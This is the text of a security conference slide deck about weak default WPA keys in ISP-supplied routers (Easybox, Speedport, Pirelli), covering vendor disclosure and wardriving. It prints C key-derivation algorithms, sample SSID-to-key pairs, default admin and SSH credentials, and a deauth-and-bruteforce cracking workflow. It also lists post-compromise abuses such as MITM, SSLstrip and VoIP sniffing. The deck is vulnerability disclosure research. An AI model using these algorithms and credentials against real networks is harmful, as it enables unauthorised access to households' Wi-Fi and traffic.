ATTENTION

thx for paying some

ViBi & 5M7X 1

 ViBi & 5M7X
WLAN-Router
HORROR Stories
ViBi & 5M7X 2
• AustriA
• Infosec Student
• Germany
• Evil Core Bootkit
• Compscience Student
• Backtrack

ViBi & 5M7X 3

 NO!
• Enterprise Wifi
• SOHO a.k.a neighbours
• Breaking WPA/WPA2
• Passphrase-algorithms
• XSS/Web
• Wardriving + mapping
• complicated
• Easy to understand
• boring
• Fun!

ViBi & 5M7X 4

ViBi & 5M7X 5
 HISTORY
When monsters are born

ViBi & 5M7X 6

NETGEAR DG834GT
• ISP in the UK
• 802.11 B/G enabled by
• A Million customers
default
• Public was informed
• Key based on mac
02.2008
• Admin:password <- webiface
• No details on the attack
• Maybe more devices were published
http://www.theregister.co.uk/2008/02/21/sky_broadband_wi_fi_keys_unpicked/

ViBi & 5M7X 7

 • French company
• Public was informed
04.2008 • Became technicolor in 2010
http://en.wikipedia.org/wiki/Technicolor_SA
• stkeys.c (still works)

ViBi & 5M7X 8

• Android-ApP
• Italian telekom complained
about the tool
• No longer avail via
android market
• Free open source projekt
• Written in java
http://code.google.com/p/android-thomson-key-solver/

ViBi & 5M7X 9

 FUNNY
News from planet earth

ViBi & 5M7X 10

http://www.darknet.org.uk/2011/03/dutch-court-rules-wi-fi-hacking-legal-in-holland/

ViBi & 5M7X 11

http://www.darknet.org.uk/2011/03/dutch-court-rules-wi-fi-hacking-legal-in-holland/

ViBi & 5M7X 12

 http://www.nsa.gov/ia/_files/factsheets/Best_Practices_Datasheets.pdf [April 2011] pages 6-7

ViBi & 5M7X 21

 doing it wrong

http://www.nsa.gov/ia/_files/factsheets/Best_Practices_Datasheets.pdf [April 2011] pages 6-7

ViBi & 5M7X 22

 WHO
A little overview
IS WHO
ViBi & 5M7X 23
 http://www.dslweb.de/bilder/quartalsberichte/dsl-marktuebersicht-2010-4-gross.gif

ViBi & 5M7X 24

 none (11,46%)
WEP (22,13%)
WPA (66,42%)

http://www.wardriving-forum.de/forum/extern_parser_statistiken.php [15.05.2011]

ViBi & 5M7X 25

 AVM (27.6%)
Arcadyan (15.5%)
Netgear (7.6%)
D-Link (7.2%)
ZyXEL (5.0%)
others < 5%

http://www.wardriving-forum.de/forum/extern_parser_statistiken.php [15.05.2011]

ViBi & 5M7X 26

 FREENET/1&1
Devices not of this earth

ViBi & 5M7X 27

 • 3rd biggest ISP in germany
• DSL Freenet -> 1&1
• hoster • Device was shipped by
• Mobilephones freenet
• Belongs to united internet • Freenet was taken over by
1&1 in 2009

ViBi & 5M7X 28

 WPA-Key Problem
• No skills/reversing needed
• Linux based OS
• Key is the last six chars
• 802.11 B/G enabled by of the internal MAC
default • Other Suspected devices
• Webinterface: No password! – G3200
• Voip/analog/isdn – G3220

• Room monitor feature • SSID

http://wiki.gpl-devices.org/wiki/Samsung_SMT-G3210
– „3200 WLAN“
– „3210 Phone WLAN SL“
– „3220 Phone WLAN“

ViBi & 5M7X 29

ViBi & 5M7X 30
ViBi & 5M7X 31
ViBi & 5M7X 32
 MAC of interesst

ViBi & 5M7X 33

 • IEEE 802.11F or Inter access point protocol
– optional extension to 802.11
– commonly used in a/b/g/n
– provides roaming features
– withdrawn in 2006
• How/why can it help us here?
http://www.proxim.com/support/techbulletins/TB-034.pdf

ViBi & 5M7X 34

ViBi & 5M7X 35
ViBi & 5M7X 36
ViBi & 5M7X 37
 MAC of interesst

ViBi & 5M7X 38

• Class-D Target (Multicast)
• 224.0.1.0-238.255.255.255
– globally-scoped (internet-wide) multicast addresses.

http://www.tcpipguide.com/free/t_IPMulticastAddressing.htm

ViBi & 5M7X 39

 • Multicast on data-link-layer from LAN-NIC
– 01:00:5e:xx:xx:xx http://www.tcpipguide.com/free/t_IPMulticastAddressing.htm

ViBi & 5M7X 40

ViBi & 5M7X 41
ViBi & 5M7X 42
ViBi & 5M7X 44
• Since it is no „bug“ there is no need to?!
• small hint on the bottom of the device that
tells you to „change your key“
• suboptimal situation. :-(

ViBi & 5M7X 45

 ARCOR/VODAFONE
Vodafone‘s deadliest accident

ViBi & 5M7X 46

 Arcor -> vodafone
• Manufactured by arcadyan
• Vodafone bought Arcor
• Very widespread
• British company
• 2nd biggest ISP in germany
• 3,5 mio broadband
customers (Q4 2010)

ViBi & 5M7X 47

 • Easybox A 300 • Manufactured by Arcadyan
• Easybox A 400 • Runs Proprietary os made by arcadyan
• EasyBox A 401 • Distribution (at least)
• Easybox A 600 since 2006
• Easybox A 601 • Customers forced to use Easybox (Voip, …)
• Easybox A 800 • Webinterface:
• Easybox A 801 – root:1234
– root:123456
• Easybox 402
• Ssid:
• Easybox 602 – Easybox-XXXXXX
• Easybox 802 – Arcor-XXXXXX
• Easybox 803 – Vodafone-XXXXXX

ViBi & 5M7X 48

ViBi & 5M7X 49
 • WPA key is based on
– MAC
– serial number
• MAC = BSSID
• Serial number is based on mac ;-)
char mac[6] 0x00 0x1D 0x19 0x8F 0xFF 0xFF

char sn[10] 0 0 0 0 0 6 5 5 3 5 ToDec

ViBi & 5M7X 50

char k1 = calc_k(mac_str[10] + mac_str[11] + sn[6] + sn[7]);
char k2 = calc_k(mac_str[8] + mac_str[9] + sn[8] + sn[9])

char calc_k(int k){

int tmp = k;
tmp >>= 4;
tmp <<= 4;

k -= tmp;
k &= 0xFF;
return k;
}

ViBi & 5M7X 51

key[0] = k1 ^ sn[9];
key[1] = k2 ^ mac_str[9];
key[2] = mac_str[10] ^ sn[9];
key[3] = k1 ^ sn[8];
key[4] = k2 ^ mac_str[10];
key[5] = mac_str[11] ^ sn[8];
key[6] = k1 ^ sn[7];
key[7] = k2 ^ mac_str[11];
key[8] = k1 ^ k2;

sprintf(wpa_key, "%1X%1X%1X%1X%1X%1X%1X%1X%1X",
key[0],key[1],key[2],key[3],key[4],key[5],key[6],key[7],key[8]);

ViBi & 5M7X 52

ViBi & 5M7X 54
 “usual” way

their way

enhanced
privacy!

ViBi & 5M7X 55

 Mac

SN = T(MAC)

K1, K2

ViBi & 5M7X 56

ViBi & 5M7X 57
• None on the sticker
• None on the homepage
• None in the manual

ViBi & 5M7X 59

 • Bug discovered 04.03.2011
• Bug verified 05.03.2011
• 31.03.2011 Vodafone was informed
– …that this will be presented at a “sec-con” in
berlin by the end of may.
– Vodafone confirmed that they will reproduce
this on their own.  good luck!
• NO reaction as of today?!
• No Firmware updates
ViBi & 5M7X 60
 Don‘t you
vodafone rebels
down there think
that this is worth
some beer!?

ViBi & 5M7X 61

 D-TELEKOM
Half taiwan. Half german. All fail

ViBi & 5M7X 62

 • Derived from the „PoST“ a.k.a.
„bundespest“
• Biggest ISP in germany
• 54% DSL Market share
• Backbones
• Mobile telephony infrastructure
• Telephone infrastructure

ViBi & 5M7X 63

 http://www.h-online.com/security/news/item/WPA-key-of-Speedport-routers-too-simple-1063308.html

ViBi & 5M7X 64

 http://www.h-online.com/security/news/item/WPA-key-of-Speedport-routers-too-simple-1063308.html

NO, It‘s from Hitachi.

ViBi & 5M7X 65

 • Arcadyan Device
• WIFI 802.11b/g
• Atheros/Madwifi-drivers
• SSID hidden by default
• Webinterface
– 0000
• Key based on mac + SN
• Proprietary OS
• MIPS CPU

ViBi & 5M7X 66

 • Arcadyan device
• Wifi 802.11b/g
• WPA/WPA PSK
• Webinterface
– 0000
• Atheros/Madwifi-drivers
• Proprietary OS
• MIPS CPU

ViBi & 5M7X 67

 • W 303V (Type A) • Manufactured by Arcadyan
• W 500 (Taiwan)
• W 502V • Runs Proprietary os
• W 503V (Type C) • Distribution (at least)
• W 504V since 2006
• W 700V • Ssid:
• W 720V – WLAN-XXXXXX
• W 722V (Type B)
• W 723V (Type B)

ViBi & 5M7X 68

 • WPA key is based on
– MAC
– serial number
• MAC = BSSID
• Serial number is unknown ;-(
• parts of serial number
are used in SSID :-)

ViBi & 5M7X 69

ViBi & 5M7X 70
 sprintf(ssid,
"WLAN-%c%c%c%c%c%c",
mac_str[6],
mac_str[7],
mac_str[8],
mac_str[9],
sn[5],
sn[9]);

ViBi & 5M7X 71

 snprintf(wpa_key,12,
"SP-%c%c%c%c%c%c%c%c%c", W 303V (Type A)
sn[5], W 500V
sn[8], W 502
sn[9], W 700V
mac_str[9], W 720V
mac_str[10],
mac_str[11],
???
sn[4],
sn[7], sn[4]
sn[8]); sn[7]
sn[8]
ViBi & 5M7X 72
 snprintf(wpa_key,16,
"%c%c%c%02d%02d%02d%c%c%c%02d%02d", NEW™
sn[5],
sn[8],
sn[9], W722 (Typ B)
mac_str[9], W504V
mac_str[10],
mac_str[11], ???
sn[4],
sn[7], sn[4]
sn[8], sn[7]
mac_str[7],
mac_str[8]);
NEW™ sn[8]

ViBi & 5M7X 73

YES! NO!
SSID BSSID SN KEY

WLAN-9EC812 00:12:BF:9E:C8:40 J634317932 SP-132840393

WLAN-81DD62 00:12:BF:81:DD:A7 J619366492 SP-692DA7349

WLAN-C9D903 00:12:BF:C9:D9:42 J642302023 SP-023942302

WLAN-8FF093 00:12:BF:8F:F0:41 J625390063 SP-963041306

ViBi & 5M7X 83

• Nothing new here
• Generate a dictionary (1000 keys)
• Deauth the client to get the wpa-
handshake
• Bruteforce the handshake with the
generated list
• Finnish cracking in 5 seconds or less

ViBi & 5M7X 84

ViBi & 5M7X 87
• Problem: 1000 Key-Combinations left and no
client connected
• Solution: bruteforce the keyspace with
eapol-key#2 attempts
• via patched wpa_supplicant
– up to 66,666 min (4seconds*1000/60)
• Custom tool needed
– speedpwn = less than 5min (C/Linux/aircrack-lib)

ViBi & 5M7X 89

ViBi & 5M7X 90
ViBi & 5M7X 91
Repeat
<=1000
times

ViBi & 5M7X 92

 demo
Speedport W 700V
clientless -> speedpwn

ViBi & 5M7X 93

ViBi & 5M7X 94
ViBi & 5M7X 96
Your speedport W 700V has aN individual SSID
and encryption is set up by default with
WPA/WPA2 and pre-shared-key. You find The
Data on the label on the back of your device.
We recommend you to keep the default
settings.
ViBi & 5M7X 97
Your speedport W 700V has aN individual SSID
and encryption is set up by default with
WPA/WPA2 and pre-shared-key. You find The
Data on the label on the back of your device.
We recommend you to keep the default
settings.
ViBi & 5M7X 98
 • Heise wrote about this problem 08.2010
• Telekom was informed via several channels
– some did not even understand the problem
– others told us the products are out of service
• NO reaction as of today
• No Firmware updates
• Some devices are still sold
– e.g. Speedport W 504V
• Public not informed by the telekom
• SNAFU (Situation normal all fucked up)

ViBi & 5M7X 99

 A1 TELEKOM AUSTRIA
Piranha Pirelli Broadband PRGAV4202N

ViBi & 5M7X 100

• Used by telekom austria
• Also used in switzerland
ViBi & 5M7X
• Customers
– 5 mio. mobile phones
– 2.3 mio. analog lines
– 98% of the population uses
DSL
101
• ADSL/ADSL2+/vdsL2 Support
• Linux with openrg router middleware
– lots of OpenRG functionality not available
• 2 USB 2.0 Ports
– print server
– NAS
• 2 VOIP Lines
• SSHD
ViBi & 5M7X 102
• Used by configuration wizard
– configuration via SSH
– wizard code obfuscated
– does not check server certificate :-)
• Masquerade attack (custom openssh server)
– User: Telek0m
– Pass: Austria&Eur0
• SSHD initially listened on WAN-side (firmware
V.2505)
ViBi & 5M7X 103
 http://www.h-online.com/security/news/item/WPA-key-of-Speedport-routers-too-simple-1063308.html

ViBi & 5M7X 104

• Key entirely based on (Internal) MAC
• Internal MAC = BSSID -5

ViBi & 5M7X 105

unsigned char str_garbage[]= {0x54, 0x45,
0x4F, 0x74, 0x65, 0x6C, 0xB6, 0xD9, 0x86,
0x96, 0x8D, 0x34, 0x45, …};
…
SHA256_Update(&context, str_garbage, 32);
SHA256_Update(&context, mac, 6);
SHA256_Final(hash, &context);
supercrypt(hash);

ViBi & 5M7X 106

char codebook[]="0123456789ABCDEFGHIKJLMNOPQRSTUVWXYZabcdefghikjlmnopqrstuvwxyz";
unsigned int multiplier = 0x84210843;
long long int mulres;

for ( i=0; i < 13; i++ ){

byte = hash[i];
byte_mod1 = byte >> 1;
mulres = (long long int) byte_mod1 * multiplier;
byte_mod1 = mulres >> 32;
byte_mod1 >>= 4;
byte_mod2 = byte_mod1 << 5;
byte_mod2 -= byte_mod1;
byte_mod2 <<= 1;
byte -= byte_mod2;

passphrase[i] = codebook[byte];
}
*(passphrase+13) = 0;

ViBi & 5M7X 107

• „many“ customers vulnerable
– 1.2 mio. broadband customers total (Q1 2011
report)
– Thomson TG585
• algorithm published in 2008 (via GNUCITICEN)
– Pirelli PRGAV4202N
• except ones with new hw-revision
• Customers are still not told to change
passwords
ViBi & 5M7X 109
• Contacted them in december 2010
• Acknowledged problem
– fixed in next hw-revision
• meeting in february
• Promised that they will inform customers
– never happened

ViBi & 5M7X 110

 WARDRIVING
They run on Club-Mate and they eat access points

ViBi & 5M7X 111

• IBM/Lenovo Thinkpad X60
• 2 Alfa AWUS036h with rtl8187 chipset
• 2 Omni-antennas + magnet mounts
• Navilock NL-402u gps-mouse
• Car-powersupply
• Driving-plan
• Car + driver + explanation for the cops

ViBi & 5M7X 112

ViBi & 5M7X 113
 • Linux (BackTrack 4R2)
• GPSD
• Kismet-NG
• GISKismet
• Google maps/earth

ViBi & 5M7X 114

ViBi & 5M7X 115
 none (11,46%)
WEP (22,13%)
WPA (66,42%)

http://www.wardriving-forum.de/forum/extern_parser_statistiken.php [15.05.2011]

ViBi & 5M7X 116

 None

WEP

WPA

ViBi & 5M7X 117

 None
WEP
WPA
EasyBox
Speedport

ViBi & 5M7X 118

ViBi & 5M7X 121
ViBi & 5M7X 122
 MALICIOUS INTENTS?
Horror++ for not so whitehat sissies

ViBi & 5M7X 123

 • Free internets
• Change DNS server
• Vpn/SSH
• MITM
– ettercap/cain&abel
– SSLtrip

ViBi & 5M7X 124

 • Telephony
– SIP/VoIP-Sniffing/Abuse
– See incomming/outgoing calls
• remote administration via webinterface
• Notification
– TR-069 URL
– firmware update URL
• malicious firmware
– doable on Linux (toolchain)
– hard on proprietary systems

ViBi & 5M7X 125

ViBi & 5M7X 126
 • Fon-AP as client
• Firmware flash
• Tripod
• Preserving jar gums
• Directional antenna
• Lan over Powerline
• 2nd ap for yourself
• Neighbour in reach
=win!

ViBi & 5M7X 127

 tm

• Sharp Zaurus
• Dlink wifi adapter
• pigtail
modifications
• ~18 db antenna
• Linux + kismet
= AWESOME!

ViBi & 5M7X 128

ViBi & 5M7X 129
 IT‘S EVERYWHERE?
And nothing can stop it!

ViBi & 5M7X 130

 00:12:BF:XX:XX:XX
00:1A:2A:xx:xx:xx
00:1D:19:xx:xx:xx
00:23:08:xx:xx:xx
00:26:4D:xx:xx:xx
7C:4F:B5:xx:xx:xx
88:25:2C:xx:xx:xx
ViBi & 5M7X 131
• France
– 00:12:bf:XX:XX:XX/belkin54g
– 00:12:bf:XX:XX:XX/WLAN
– 00:1d:19:14:71:55/TELE2BOX_1FC8
– 00:1d:19:70:b1:ae/SFR_ADSL_01783
– 00:1d:19:57:03:d7/DartyBox_20D1
– 00:1d:19:ae:82:9b/Businesslivebox_829b
– 00:23:08:2d:51:7d/CD019NLR8C_DATA
– 00:23:08:f9:8e:d1/Livebox-0914

ViBi & 5M7X 132

• Denmark
– 00:1a:2a:52:89:75/WLAN-528937
– 00:1d:19:6e:9f:7e/PHILIPS_6E9F7C
• Italy
– 00:12:bf:XX:XX:XX/philips
– 00:1d:19:46:6c:22/PHILIPS_466C20
– 00:1d:19:c9:aa:57/WLAN_C9AA56
• Switzerland
– 00:12:bf:XX:XX:XX/philips
– 00:1d:19:48:51:b9/PHILIPS_4851B7
– 00:26:4d:16:fe:af/EasyBox-16FE69 <- woot!

ViBi & 5M7X 133

• Netherlands (remember the court-decision)
– 00:12:bf:XX:XX:XX/belkin54g
– 00:12:bf:XX:XX:XX/Philips WiFi
– 00:1a:2a:9d:f6:a5/CIA67209df6a3
– 88:25:2c:ec:e9:c7/ARV7519ECE9C7
– 00:1a:2a:9d:fe:f5/ WiFi_F5
• Spain (ya.com already pwned!)
– 00:26:4d:49:b5:3e/WLAN9B5962
– 88:25:2c:92:53:fe/WiFi253965
– All with SSID: YACOMXXXXXX as well
ViBi & 5M7X 134
• Uk
– 00:12:bf:XX:XX:XX/belkin54g
– 00:12:bf:XX:XX:XX/philips
– 00:12:bf:XX:XX:XX/TalkTalk_install
– 00:1a:2a:XX:XX:XX/MicradigitalWLAN
– 00:1d:19:90:c7:75/PHILIPS_90C773
– 00:12:bf:31:b7:8e/WLAN_31B78C
– 00:26:4d:01:d4:08/Thomson01D408
– 00:26:4d:59:4b:b0/Thomson594BB0-Tesco Broadband
– 00:26:4d:b1:9f:47/VodafoneSharingDock_B19F45

ViBi & 5M7X 135

• US
– 00:12:bf:XX:XX:XX/SecureConnect
– 00:12:bf:XX:XX:XX/linksys
– 00:1a:2a:XX:XX:XX/fortinet
– 00:12:bf:14:fa:46/FGT01
– 00:12:bf:3c:5f:5d/07B404364473
– 00:23:08:0e:7c:00/00:23:08:0E:7C:00

ViBi & 5M7X 136

REVERSING 101
The dead code that lives!!!

ViBi & 5M7X 137

 • Unpack firmware
• Load it into ida
• find load address
• Learn mips :)
• static analasys
• write algorithm in c

ViBi & 5M7X 138

 • RISC
• 32 bit instructions size
• lots of registers
• Big/Little endian
• used in a lot of routers

ViBi & 5M7X 139

• Arguments • return value
1. $a0 - $a3 • $v0
2. $t0 - $t3
3. stack

ViBi & 5M7X 140

 QUESTIONS ?!
you should ask them before we are too drunk!

ViBi & 5M7X 141

• FX & phenoelit for the
• Thomas Kessler speedport
honour to speak on
firmware unpacker!
#phNeutral
• Andi_84 Speedport Firmware
• You for spending your time unpacker #2!
and attention on this talk • Gnoxter for speedpwn-
• Belial for crossreading and development and latenight
giving us the guts! debugging sessions!

ViBi & 5M7X 142